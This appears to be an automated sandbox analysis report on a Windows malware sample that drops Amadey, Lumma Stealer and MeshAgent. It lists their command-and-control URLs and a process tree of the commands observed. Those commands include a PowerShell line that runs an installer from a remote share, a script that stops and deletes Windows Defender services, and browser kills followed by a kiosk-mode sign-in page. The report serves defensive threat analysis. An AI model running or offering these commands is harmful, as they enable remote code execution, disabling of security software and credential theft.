Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/04/2025, 18:08

General

  • Target

    random.exe

  • Size

    1.8MB

  • MD5

    511a46ccd78cce08bbe3852e46759f3a

  • SHA1

    1e5432375da94d634caef4fc85ed3bb3edb09651

  • SHA256

    b8a3e996398fb26ef8050911baefffc55e9787668fa1bb97b2a9c7567e57cb6c

  • SHA512

    75f4176830921ba65ba6fba1cafe6ff5291e4c583f71866b7485cbfee1f5611edf7258e41b346cfdf68bf1c1d83967ef11c9af6792a93e109e0739c6a328a7ec

  • SSDEEP

    49152:jOKL0j4+oEcJwrf1LLlVaDkMVEz9fKh3ccDnz:Uj4zJCLXahVB3zH

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://krxspint.digital/kendwz

https://jrxsafer.top/shpaoz

https://rhxhube.run/pogrs

https://ogrxeasyw.digital/xxepw

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://xrfxcaseq.live/gspaz

https://ywmedici.top/noagis

https://pepperiop.digital/oage

https://plantainklj.run/opafg

https://puerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://3z7advennture.top/GKsiio

https://rambutanvcx.run/adioz

https://navstarx.shop/FoaJSi

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

Extracted

Family

meshagent

Version

2

Botnet

test123

C2

http://aaso12.duckdns.org:443/agent.ashx

Attributes
  • mesh_id

    0x0CF4A8B0663DD2F1D3A44CE8D231621166DBDB1E723B374C911544DE2F45A87C6C52F7206CED32F5B6A52A5551B75A3C

  • server_id

    22F126392DFCD804B6AF755F256A707D53ED8D200650E6BC853C95860F21B6B7049AF4EBEAB393E6EE1A9315B396BFC8

  • wss

    wss://aaso12.duckdns.org:443/agent.ashx

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Detects MeshAgent payload 1 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Meshagent family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 13 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Sets service image path in registry 2 TTPs 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 30 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 64 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 14 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 46 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 18 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 26 IoCs
  • Suspicious use of FindShellTrayWindow 32 IoCs
  • Suspicious use of SendNotifyMessage 26 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\random.exe
    "C:\Users\Admin\AppData\Local\Temp\random.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:5672
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2476
      • C:\Users\Admin\AppData\Local\Temp\10447480101\Mbxp0H9.exe
        "C:\Users\Admin\AppData\Local\Temp\10447480101\Mbxp0H9.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2100
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5240
          • C:\Users\Admin\AppData\Roaming\dHoOS9OdFu.exe
            "C:\Users\Admin\AppData\Roaming\dHoOS9OdFu.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:5200
            • C:\Users\Admin\AppData\Roaming\dHoOS9OdFu.exe
              "C:\Users\Admin\AppData\Roaming\dHoOS9OdFu.exe" h
              6⤵
              • Executes dropped EXE
              PID:3468
          • C:\Users\Admin\AppData\Roaming\tFtfP0IiOz.exe
            "C:\Users\Admin\AppData\Roaming\tFtfP0IiOz.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3700
      • C:\Users\Admin\AppData\Local\Temp\10447710101\7q8Wm5h.exe
        "C:\Users\Admin\AppData\Local\Temp\10447710101\7q8Wm5h.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4788
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10449261121\pfJNmVW.cmd"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3860
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Start-Process cmd -ArgumentList '/c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall' -windowstyle hidden -Verb RunAs; # Cloudflare verification (Ray ID: 90b0e54eb8bdaasd84)
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4612
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1704
            • C:\Windows\SysWOW64\net.exe
              net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1416
            • \??\UNC\aaso12.duckdns.org\shear\s.exe
              \\aaso12.duckdns.org\shear\s -fullinstall
              6⤵
              • Sets service image path in registry
              • Drops file in Program Files directory
              PID:4676
      • C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe
        "C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4668
        • C:\Users\Admin\AppData\Local\Temp\262.exe
          "C:\Users\Admin\AppData\Local\Temp\262.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3520
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C459.tmp\C46A.tmp\C46B.bat C:\Users\Admin\AppData\Local\Temp\262.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1484
            • C:\Users\Admin\AppData\Local\Temp\262.exe
              "C:\Users\Admin\AppData\Local\Temp\262.exe" go
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1080
              • C:\Windows\system32\cmd.exe
                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C563.tmp\C564.tmp\C565.bat C:\Users\Admin\AppData\Local\Temp\262.exe go"
                7⤵
                • Drops file in Program Files directory
                • Suspicious use of WriteProcessMemory
                PID:3512
                • C:\Windows\system32\sc.exe
                  sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                  8⤵
                  • Launches sc.exe
                  PID:4908
                • C:\Windows\system32\sc.exe
                  sc start ddrver
                  8⤵
                  • Launches sc.exe
                  PID:1808
                • C:\Windows\system32\timeout.exe
                  timeout /t 1
                  8⤵
                  • Delays execution with timeout.exe
                  PID:1868
                • C:\Windows\system32\sc.exe
                  sc stop ddrver
                  8⤵
                  • Launches sc.exe
                  PID:4052
                • C:\Windows\system32\sc.exe
                  sc start ddrver
                  8⤵
                  • Launches sc.exe
                  PID:5644
                • C:\Windows\system32\takeown.exe
                  takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                  8⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:3728
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                  8⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:4616
                • C:\Windows\system32\sc.exe
                  sc stop "WinDefend"
                  8⤵
                  • Launches sc.exe
                  PID:3636
                • C:\Windows\system32\sc.exe
                  sc delete "WinDefend"
                  8⤵
                  • Launches sc.exe
                  PID:5408
                • C:\Windows\system32\reg.exe
                  reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                  8⤵
                    PID:1860
                  • C:\Windows\system32\sc.exe
                    sc stop "MDCoreSvc"
                    8⤵
                    • Launches sc.exe
                    PID:5332
                  • C:\Windows\system32\sc.exe
                    sc delete "MDCoreSvc"
                    8⤵
                    • Launches sc.exe
                    PID:3772
                  • C:\Windows\system32\reg.exe
                    reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                    8⤵
                      PID:3468
                    • C:\Windows\system32\sc.exe
                      sc stop "WdNisSvc"
                      8⤵
                      • Launches sc.exe
                      PID:2396
                    • C:\Windows\system32\sc.exe
                      sc delete "WdNisSvc"
                      8⤵
                      • Launches sc.exe
                      PID:5964
                    • C:\Windows\system32\reg.exe
                      reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                      8⤵
                        PID:1124
                      • C:\Windows\system32\sc.exe
                        sc stop "Sense"
                        8⤵
                        • Launches sc.exe
                        PID:2224
                      • C:\Windows\system32\sc.exe
                        sc delete "Sense"
                        8⤵
                        • Launches sc.exe
                        PID:4224
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                        8⤵
                          PID:3332
                        • C:\Windows\system32\sc.exe
                          sc stop "wscsvc"
                          8⤵
                          • Launches sc.exe
                          PID:1428
                        • C:\Windows\system32\sc.exe
                          sc delete "wscsvc"
                          8⤵
                          • Launches sc.exe
                          PID:2380
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                          8⤵
                          • Modifies security service
                          PID:1948
                        • C:\Windows\system32\sc.exe
                          sc stop "SgrmBroker"
                          8⤵
                          • Launches sc.exe
                          PID:6004
                        • C:\Windows\system32\sc.exe
                          sc delete "SgrmBroker"
                          8⤵
                          • Launches sc.exe
                          PID:3656
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                          8⤵
                            PID:3984
                          • C:\Windows\system32\sc.exe
                            sc stop "SecurityHealthService"
                            8⤵
                            • Launches sc.exe
                            PID:3756
                          • C:\Windows\system32\sc.exe
                            sc delete "SecurityHealthService"
                            8⤵
                            • Launches sc.exe
                            PID:6048
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                            8⤵
                              PID:5492
                            • C:\Windows\system32\sc.exe
                              sc stop "webthreatdefsvc"
                              8⤵
                              • Launches sc.exe
                              PID:4088
                            • C:\Windows\system32\sc.exe
                              sc delete "webthreatdefsvc"
                              8⤵
                              • Launches sc.exe
                              PID:5544
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                              8⤵
                                PID:1692
                              • C:\Windows\system32\sc.exe
                                sc stop "webthreatdefusersvc"
                                8⤵
                                • Launches sc.exe
                                PID:2156
                              • C:\Windows\system32\sc.exe
                                sc delete "webthreatdefusersvc"
                                8⤵
                                • Launches sc.exe
                                PID:1192
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                8⤵
                                  PID:6080
                                • C:\Windows\system32\sc.exe
                                  sc stop "WdNisDrv"
                                  8⤵
                                  • Launches sc.exe
                                  PID:4944
                                • C:\Windows\system32\sc.exe
                                  sc delete "WdNisDrv"
                                  8⤵
                                  • Launches sc.exe
                                  PID:5104
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                  8⤵
                                    PID:3020
                                  • C:\Windows\system32\sc.exe
                                    sc stop "WdBoot"
                                    8⤵
                                    • Launches sc.exe
                                    PID:5536
                                  • C:\Windows\system32\sc.exe
                                    sc delete "WdBoot"
                                    8⤵
                                    • Launches sc.exe
                                    PID:1964
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                    8⤵
                                      PID:3592
                                    • C:\Windows\system32\sc.exe
                                      sc stop "WdFilter"
                                      8⤵
                                      • Launches sc.exe
                                      PID:2544
                                    • C:\Windows\system32\sc.exe
                                      sc delete "WdFilter"
                                      8⤵
                                      • Launches sc.exe
                                      PID:4980
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                      8⤵
                                        PID:5936
                                      • C:\Windows\system32\sc.exe
                                        sc stop "SgrmAgent"
                                        8⤵
                                        • Launches sc.exe
                                        PID:3116
                                      • C:\Windows\system32\sc.exe
                                        sc delete "SgrmAgent"
                                        8⤵
                                        • Launches sc.exe
                                        PID:4148
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                        8⤵
                                          PID:5620
                                        • C:\Windows\system32\sc.exe
                                          sc stop "MsSecWfp"
                                          8⤵
                                          • Launches sc.exe
                                          PID:4632
                                        • C:\Windows\system32\sc.exe
                                          sc delete "MsSecWfp"
                                          8⤵
                                          • Launches sc.exe
                                          PID:2356
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                          8⤵
                                            PID:1516
                                          • C:\Windows\system32\sc.exe
                                            sc stop "MsSecFlt"
                                            8⤵
                                            • Launches sc.exe
                                            PID:4468
                                          • C:\Windows\system32\sc.exe
                                            sc delete "MsSecFlt"
                                            8⤵
                                            • Launches sc.exe
                                            PID:1856
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                            8⤵
                                              PID:5928
                                            • C:\Windows\system32\sc.exe
                                              sc stop "MsSecCore"
                                              8⤵
                                              • Launches sc.exe
                                              PID:5844
                                            • C:\Windows\system32\sc.exe
                                              sc delete "MsSecCore"
                                              8⤵
                                              • Launches sc.exe
                                              PID:4208
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                              8⤵
                                                PID:856
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                8⤵
                                                  PID:4836
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                  8⤵
                                                    PID:5896
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                    8⤵
                                                      PID:6128
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                      8⤵
                                                        PID:5892
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop ddrver
                                                        8⤵
                                                        • Launches sc.exe
                                                        PID:5164
                                                      • C:\Windows\system32\sc.exe
                                                        sc delete ddrver
                                                        8⤵
                                                        • Launches sc.exe
                                                        PID:5344
                                            • C:\Users\Admin\AppData\Local\Temp\10450110101\1d96eeb059.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10450110101\1d96eeb059.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              • System Location Discovery: System Language Discovery
                                              PID:2668
                                              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10450110101\1d96eeb059.exe"
                                                4⤵
                                                • Downloads MZ/PE file
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:3640
                                            • C:\Users\Admin\AppData\Local\Temp\10450120101\268a518848.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10450120101\268a518848.exe"
                                              3⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • Suspicious use of SetThreadContext
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:3376
                                              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10450120101\268a518848.exe"
                                                4⤵
                                                • Downloads MZ/PE file
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:5316
                                            • C:\Users\Admin\AppData\Local\Temp\10450130101\RLPhvHg.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10450130101\RLPhvHg.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:1788
                                            • C:\Users\Admin\AppData\Local\Temp\10450150101\abb6489dab.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10450150101\abb6489dab.exe"
                                              3⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:1256
                                            • C:\Users\Admin\AppData\Local\Temp\10450160101\a6c25b1806.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10450160101\a6c25b1806.exe"
                                              3⤵
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              PID:2700
                                            • C:\Users\Admin\AppData\Local\Temp\10450170101\7d66731089.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10450170101\7d66731089.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of SendNotifyMessage
                                              PID:3372
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /F /IM firefox.exe /T
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:64
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /F /IM chrome.exe /T
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2904
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /F /IM msedge.exe /T
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5588
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /F /IM opera.exe /T
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2420
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /F /IM brave.exe /T
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2860
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                4⤵
                                                  PID:3408
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                    5⤵
                                                    • Checks processor information in registry
                                                    • Modifies registry class
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SendNotifyMessage
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:1692
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {cf70559b-f4f7-4b66-98e1-6c6694b67d12} -parentPid 1692 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1692" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                      6⤵
                                                        PID:1776
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2500 -prefsLen 27135 -prefMapHandle 2504 -prefMapSize 270279 -ipcHandle 2512 -initialChannelId {4746739b-ff55-4651-ac00-7b02573135a6} -parentPid 1692 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1692" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                        6⤵
                                                          PID:5512
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3820 -prefsLen 25164 -prefMapHandle 3824 -prefMapSize 270279 -jsInitHandle 3828 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3836 -initialChannelId {d2647da1-59a5-4375-bf0f-62034ff2bf48} -parentPid 1692 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1692" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                          6⤵
                                                          • Checks processor information in registry
                                                          PID:1928
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4004 -prefsLen 27276 -prefMapHandle 4008 -prefMapSize 270279 -ipcHandle 4076 -initialChannelId {8ab737e2-60e6-45ab-aa63-d6a87134fd74} -parentPid 1692 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1692" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                          6⤵
                                                            PID:4724
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2824 -prefsLen 34775 -prefMapHandle 2720 -prefMapSize 270279 -jsInitHandle 2816 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3328 -initialChannelId {a1f9ac70-f405-42df-82ae-ccb7f8097b48} -parentPid 1692 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1692" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                            6⤵
                                                            • Checks processor information in registry
                                                            PID:5932
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5000 -prefsLen 35012 -prefMapHandle 4964 -prefMapSize 270279 -ipcHandle 5020 -initialChannelId {c777a5a8-31a3-44d2-9c96-163b334691be} -parentPid 1692 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1692" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                            6⤵
                                                            • Checks processor information in registry
                                                            PID:2836
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5428 -prefsLen 32952 -prefMapHandle 5432 -prefMapSize 270279 -jsInitHandle 5436 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5408 -initialChannelId {7b3b1cd8-84e5-436d-8ab4-5e01232942ec} -parentPid 1692 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1692" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                            6⤵
                                                            • Checks processor information in registry
                                                            PID:4328
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5600 -prefsLen 32952 -prefMapHandle 5604 -prefMapSize 270279 -jsInitHandle 5608 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5616 -initialChannelId {1a1e4151-0eee-41bc-ba02-0286988b73b5} -parentPid 1692 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1692" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                            6⤵
                                                            • Checks processor information in registry
                                                            PID:4332
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5788 -prefsLen 32952 -prefMapHandle 5792 -prefMapSize 270279 -jsInitHandle 5796 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5804 -initialChannelId {5ff772c2-28e9-4090-a67a-781928d87fec} -parentPid 1692 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1692" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                            6⤵
                                                            • Checks processor information in registry
                                                            PID:3772
                                                    • C:\Users\Admin\AppData\Local\Temp\10450180101\66a7aa70aa.exe
